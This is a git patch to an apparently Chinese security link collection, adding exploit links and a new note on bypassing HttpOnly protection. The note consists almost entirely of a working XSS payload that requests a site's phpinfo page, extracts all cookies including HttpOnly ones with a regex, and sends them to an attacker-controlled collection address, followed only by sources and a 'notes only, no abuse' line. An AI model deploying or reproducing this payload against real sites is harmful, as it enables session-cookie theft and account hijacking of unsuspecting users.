From 3695594eb8722a0d91683048dde77725aab7fe7e Mon Sep 17 00:00:00 2001
From: Mrxn <mrxn.net@gmail.com>
Date: Mon, 13 Apr 2020 21:02:53 +0800
Subject: [PATCH] =?UTF-8?q?add=20=E9=80=9A=E8=BF=87phpinfo=E8=8E=B7?=
 =?UTF-8?q?=E5=8F=96cookie=E7=AA=81=E7=A0=B4httponly.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 README.md                            |  3 ++-
 通过phpinfo获取cookie突破httponly.md | 36 ++++++++++++++++++++++++++++
 2 files changed, 38 insertions(+), 1 deletion(-)
 create mode 100644 通过phpinfo获取cookie突破httponly.md

diff --git a/README.md b/README.md
index 8184f87..c49a98e 100644
--- a/README.md
+++ b/README.md
@@ -180,7 +180,7 @@
 - [WinRAR 代码执行漏洞 (CVE-2018-20250)-POC](https://github.com/Ridter/acefile)|[相关文章](https://research.checkpoint.com/2019/extracting-code-execution-from-winrar/)|[全网筛查 WinRAR 代码执行漏洞 (CVE-2018-20250)](https://xlab.tencent.com/cn/2019/02/22/investigating-winrar-code-execution-vulnerability-cve-2018-20250-at-internet-scale/)
 - [windows10相关漏洞EXP&POC](https://github.com/nu11secur1ty/Windows10Exploits)
 - [shiro rce 反序列 命令执行 一键工具](https://github.com/wyzxxz/shiro_rce)
-- [CVE-2019-1458-Win32k中的特权提升漏洞](https://github.com/unamer/CVE-2019-1458)
+- [CVE-2019-1458-Win32k中的特权提升漏洞【shell可用-Windows提取】](https://github.com/unamer/CVE-2019-1458)
 
 
 ## <span id="head7"> tools-小工具集合</span>
@@ -282,6 +282,7 @@
 - [mssqli-duet-用于mssql的sql注入脚本,使用RID爆破,从Active Directory环境中提取域用户](https://github.com/Keramas/mssqli-duet)
 - [【Android脱壳】之一键提取APP敏感信息](https://github.com/TheKingOfDuck/ApkAnalyser)
 - [Shiro系列漏洞检测GUI版本-ShiroExploit GUI版本](https://github.com/feihong-cs/ShiroExploit_GUI)
+- [通过phpinfo获取cookie突破httponly](./通过phpinfo获取cookie突破httponly.md)
 
 ## <span id="head8"> 文章/书籍/教程相关</span>
 
diff --git a/通过phpinfo获取cookie突破httponly.md b/通过phpinfo获取cookie突破httponly.md
new file mode 100644
index 0000000..01629a7
--- /dev/null
+++ b/通过phpinfo获取cookie突破httponly.md
@@ -0,0 +1,36 @@
+### `XSS`代码
+
+```javascript
+<script>
+function createXmlHttp() {
+    if (window.XMLHttpRequest) {
+       xmlHttp = new XMLHttpRequest();               
+    } else {
+       xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
+    }
+}
+function getS() {
+    var Url = 'PHPinfo的地址';
+    createXmlHttp();
+    xmlHttp.onreadystatechange = writeS;
+    xmlHttp.open("GET", Url, true);
+    xmlHttp.send(null);
+}
+function writeS() {
+    if (xmlHttp.readyState == 4) {
+     var x = xmlHttp.responseText.match(/HTTP_COOKIE.+?<\/td><td.+?>([\w\W]+?)<\/td>/);
+     if (x){
+        var url = "自己收取cookie的地址" + x[1]; //x 为带httponly cookie的所有cookie
+        createXmlHttp();
+        xmlHttp.open("GET", url, true);
+        xmlHttp.send(null);  
+       }   
+    }
+}
+getS();
+</script>
+```
+
+来源：https://www.t00ls.net/thread-55915-1-1.html https://www.t00ls.net/thread-55912-1-1.html
+
+仅作笔记.禁止滥用.
\ No newline at end of file